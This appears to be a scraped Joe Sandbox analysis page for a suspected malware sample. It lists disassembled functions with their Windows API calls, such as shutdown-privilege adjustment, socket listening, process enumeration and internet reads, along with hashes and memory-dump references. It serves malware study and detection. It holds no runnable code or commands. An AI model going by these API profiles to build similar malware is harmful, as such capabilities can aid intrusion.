Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: ERCP$Oa.$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2146716433
Opcode ID: 7a6f017579142148f5b9be0b417139f2a5bff1ec63c3a8f5469a9390cfa95635
Instruction ID: c0bfaa8aac156ad71abb81c064e5f06cecdede986323d37be65d172b92e6e86c
Opcode Fuzzy Hash: 7a6f017579142148f5b9be0b417139f2a5bff1ec63c3a8f5469a9390cfa95635
Instruction Fuzzy Hash: 5CA2B070E1425ACBDF29DF59C8407EEB7B1BF58304F6581AAD81AA7280D7709ED1CB90

Function 0033F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0033F6AB
Sleep.KERNEL32(0000000A), ref: 0033F6DB
_wcscmp.LIBCMT ref: 0033F6EF
_wcscmp.LIBCMT ref: 0033F70A
FindNextFileW.KERNEL32(?,?), ref: 0033F7A8
FindClose.KERNEL32(00000000), ref: 0033F7BE

Strings

*.*, xrefs: 0033F690

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: d7e0b7eb0ff0381911b4b3db050428a5662b83898c1ec450f49e564f6d45c8e1
Instruction ID: 9ff69a54354200309fea4471de9a0d78fc057cc21c56108810c12aac86fac4a5
Opcode Fuzzy Hash: d7e0b7eb0ff0381911b4b3db050428a5662b83898c1ec450f49e564f6d45c8e1
Instruction Fuzzy Hash: 23416C7191021A9FDB12EF64CC85EEEBBB8BF05350F544566E815A22A0EB309E94CF90

Function 0035D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

GetSystemMetrics.USER32(0000000F), ref: 0035D78A
GetSystemMetrics.USER32(0000000F), ref: 0035D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0035D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0035DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0035DA24
ShowWindow.USER32(00000003,00000000), ref: 0035DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0035DA68
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0035DA8B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID:
API String ID: 830902736-0
Opcode ID: 5d568c4bba6dab3fa8fb7fdc042cb515000f67466b70c317bc445505f9ce2c3b
Instruction ID: 645da32deaf9001e69fce5d26abe2a186e404d61ec4bd7d6810bcc61500471e1
Opcode Fuzzy Hash: 5d568c4bba6dab3fa8fb7fdc042cb515000f67466b70c317bc445505f9ce2c3b
Instruction Fuzzy Hash: 0EB19C71500215EFDF26CF68C985BBE7BB5FF44702F098069EC489B2A5D734A958CB90

Function 002E58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002E5A05
_memmove.LIBCMT ref: 002E5A55
_memmove.LIBCMT ref: 002E5ABB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2c1dcbc5cca26cdfc53b3cb704c8b0425e8db1c7334eac6142f95a8d68d6b4e8
Instruction ID: 347eea574025d9c2390b6ad58dee7c7e9a19571851edf9dd2283ae5176a8b210
Opcode Fuzzy Hash: 2c1dcbc5cca26cdfc53b3cb704c8b0425e8db1c7334eac6142f95a8d68d6b4e8
Instruction Fuzzy Hash: 4412AC70A2061ADFDF18CFA5D981AEEB3F5FF48304F504269E406A7251EB35AD25CB50

Function 002E5680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 002F0FF6: std::exception::exception.LIBCMT ref: 002F102C
Part of subcall function 002F0FF6: __CxxThrowException@8.LIBCMT ref: 002F1041

_memmove.LIBCMT ref: 0032062F
_memmove.LIBCMT ref: 00320744
_memmove.LIBCMT ref: 003207EB

Strings

yZ., xrefs: 00320881, 003207FF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ.
API String ID: 1300846289-954413788
Opcode ID: 20a6895915ab796449b1c1f2b6e01bc34f78fcbcf70697e9c3d97dc54c8c9364
Instruction ID: c0aae623f26e7c153d35dcfaa67a0952c959d9bcb2a0fe925220f7f10f7b3401
Opcode Fuzzy Hash: 20a6895915ab796449b1c1f2b6e01bc34f78fcbcf70697e9c3d97dc54c8c9364
Instruction Fuzzy Hash: EE02B170A20219DBCF09DF65E981ABEBBB5EF44300F548069E806DB256EB31DD64CF91

Function 0033545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00328CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00328D0D
Part of subcall function 00328CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00328D3A
Part of subcall function 00328CC3: GetLastError.KERNEL32 ref: 00328D47

ExitWindowsEx.USER32(?,00000000), ref: 0033549B

Strings

, xrefs: 00335489
@, xrefs: 0033548E
SeShutdownPrivilege, xrefs: 0033546B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: b1ab5039e9efd3526d422628ceec8bf212b07d298765767c80b2698d0a38c404
Instruction ID: 520280cc3db0607d495f6e082abdc41d6cb2493a87c97916533f41d77385e59b
Opcode Fuzzy Hash: b1ab5039e9efd3526d422628ceec8bf212b07d298765767c80b2698d0a38c404
Instruction Fuzzy Hash: F1014731655B112EE72F637AECCBBBA725CEB00743F250421FC07D60D3EA904C808290

Function 002E3190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa., xrefs: 002E3482

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa.
API String ID: 674341424-615990470
Opcode ID: 3015a9478275a29dc95fadb0409b721a922563014476981861bc1b4147afbfaf
Instruction ID: 78f6db95a6b35a0ae53456db21f852effdcaa733341e90189beaffb0f49cbcae
Opcode Fuzzy Hash: 3015a9478275a29dc95fadb0409b721a922563014476981861bc1b4147afbfaf
Instruction Fuzzy Hash: 1A22CB715283419FC725DF24C885BABB7E4AF88300F54492DF89A9B391DB70EE54CB92

Function 00346596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 003465EF
WSAGetLastError.WS2_32(00000000), ref: 003465FE
bind.WS2_32(00000000,?,00000010), ref: 0034661A
listen.WS2_32(00000000,00000005), ref: 00346629
WSAGetLastError.WS2_32(00000000), ref: 00346643
closesocket.WS2_32(00000000), ref: 00346657

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 69d46f8c60bb8c14d771520600b8e92fcfea1b86de308c75a4ff30866c65f28e
Instruction ID: f83d943a3770c67d37aadac474411093c11256538da90d9996650d8bfcad6223
Opcode Fuzzy Hash: 69d46f8c60bb8c14d771520600b8e92fcfea1b86de308c75a4ff30866c65f28e
Instruction Fuzzy Hash: E0219E31200210AFCB11AF24D846B6EB7EDEF49721F15815AF956AB3E1CB74AD418B51

Function 002D1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 002D19FA
GetSysColor.USER32(0000000F), ref: 002D1A4E
SetBkColor.GDI32(?,00000000), ref: 002D1A61

Part of subcall function 002D1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 002D12D8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ColorDialogNtdllProc_$LongWindow
String ID:
API String ID: 591255283-0
Opcode ID: 8eaed2481bf804bbb18bb26215f21f22d25f3bd19478c1ccba6cfae28e4796b3
Instruction ID: b276aff37cebc7bb273ae8767f14b6ccf7ad42fc9884c9de4fd54c945a759e0b
Opcode Fuzzy Hash: 8eaed2481bf804bbb18bb26215f21f22d25f3bd19478c1ccba6cfae28e4796b3
Instruction Fuzzy Hash: 67A17870136555BEEA2AAF288C65DBF359CDB46346F24011BF402D6BE6CA61CC31C2B1

Function 00346A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003480A0: inet_addr.WS2_32(00000000), ref: 003480CB

socket.WS2_32(00000002,00000002,00000011), ref: 00346AB1
WSAGetLastError.WS2_32(00000000), ref: 00346ADA
bind.WS2_32(00000000,?,00000010), ref: 00346B13
WSAGetLastError.WS2_32(00000000), ref: 00346B20
closesocket.WS2_32(00000000), ref: 00346B34

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: d67526a8435c5a6540852393aa9840233d3f0bcfdabcf79dd7062ee7d6c96f85
Instruction ID: 8e1ced4358df2e6fc0c5aa98a1eb93aea0f500627287b3987c54f60db2405f6e
Opcode Fuzzy Hash: d67526a8435c5a6540852393aa9840233d3f0bcfdabcf79dd7062ee7d6c96f85
Instruction Fuzzy Hash: FB41B175A10210AFEB11BF24DC86F6E77E8DB49710F04805AF91AAB3D2DA70AD508B91

Function 003555FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0035564C
IsWindowEnabled.USER32 ref: 0035565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00355667
IsIconic.USER32 ref: 00355675
IsZoomed.USER32 ref: 00355683

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c0fc7bd9c9d66d1f17aa5769d433e3a0c0606fe2e98d1d17418a698b74905395
Instruction ID: 93be80bd87766baec25755c19bdf87601da88029665b86f77df0777491c3cf52
Opcode Fuzzy Hash: c0fc7bd9c9d66d1f17aa5769d433e3a0c0606fe2e98d1d17418a698b74905395
Instruction Fuzzy Hash: 5D11B631300A505FD7131F26DC64F6FB79CEF44722F825429F806D7261CB30AD018A95

Function 0034F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0034F151
Process32FirstW.KERNEL32(00000000,?), ref: 0034F15F

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Process32NextW.KERNEL32(00000000,?), ref: 0034F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0034F22E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 67afae1d0229b504d6ec4ac561934b04bd034570f30d99387ddcc7959b455695
Instruction ID: 9706a2424e9e67f63ffc186f3dbe539accdb22bf56f55e513293fe7978874ddc
Opcode Fuzzy Hash: 67afae1d0229b504d6ec4ac561934b04bd034570f30d99387ddcc7959b455695
Instruction Fuzzy Hash: 46518D71518711AFD311EF24DC81A6BB7E8FF84710F14482EF495972A2EB70AE14CB92

Function 0035C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

GetCursorPos.USER32(?), ref: 0035C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0030BBFB,?,?,?,?,?), ref: 0035C7D7
GetCursorPos.USER32(?), ref: 0035C824
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0030BBFB,?,?,?), ref: 0035C85E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 967e42655399035d21d990b269795f55ef0de53768779e49c875c78ac3717c03
Instruction ID: 324ed59e1df78c340a360284d6680cf4ddc245dc7d8f9b20bd318b0d22960f83
Opcode Fuzzy Hash: 967e42655399035d21d990b269795f55ef0de53768779e49c875c78ac3717c03
Instruction Fuzzy Hash: 28318D35610218AFCB17CF58C898EEA7BBAEB49316F0540AAFD058B271D7319D54DFA0

Function 002D1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 002D12D8
GetClientRect.USER32(?,?), ref: 0030B84B
GetCursorPos.USER32(?), ref: 0030B855
ScreenToClient.USER32(?,?), ref: 0030B860

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: d26a05e50510500ec0cc0bb3ad16f35be7a4d34b779f5ca82706216a70cdb382
Instruction ID: c4f9f17de6b5322de4308609da457d060042cd3fa47405eea44d3bd5a64ac15d
Opcode Fuzzy Hash: d26a05e50510500ec0cc0bb3ad16f35be7a4d34b779f5ca82706216a70cdb382
Instruction Fuzzy Hash: 45113635A21129BFCB01EFA8D8899EE77B9EB05301F100456F901E7660D731BE618BA5

Function 0032EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0032EB19

Strings

|, xrefs: 0032EB49
(, xrefs: 0032EB5F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 84eb294e2dddebeb2b55b21d9a3d658d1f94f7caeb9994157ce77f7e5f35d146
Instruction ID: cb7895c95dfa722ba8cbf08ff9f3432db365552dabbac5b69f8d32bbc34c67c8
Opcode Fuzzy Hash: 84eb294e2dddebeb2b55b21d9a3d658d1f94f7caeb9994157ce77f7e5f35d146
Instruction Fuzzy Hash: D5325775A047159FCB29CF19D481A6AB7F0FF48310B16C56EE89ACB7A1DB70E941CB40

Function 003425E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 003426D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0034270C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 5eb9fafb3dc129d874918816a8725cf139ca0e7c72a89c38f62b1259824d7cc4
Instruction ID: e1ba48e28c576539ed787b5177c4ef2b0cced613f8cbe55da6913ce069c7fba8
Opcode Fuzzy Hash: 5eb9fafb3dc129d874918816a8725cf139ca0e7c72a89c38f62b1259824d7cc4
Instruction Fuzzy Hash: 6941F471500309BFEB22DE54CC85EBBB7FCEB40364F51406AFA01BA541EAB5BE419A60

Function 0033B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0033B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0033B655

Memory Dump Source

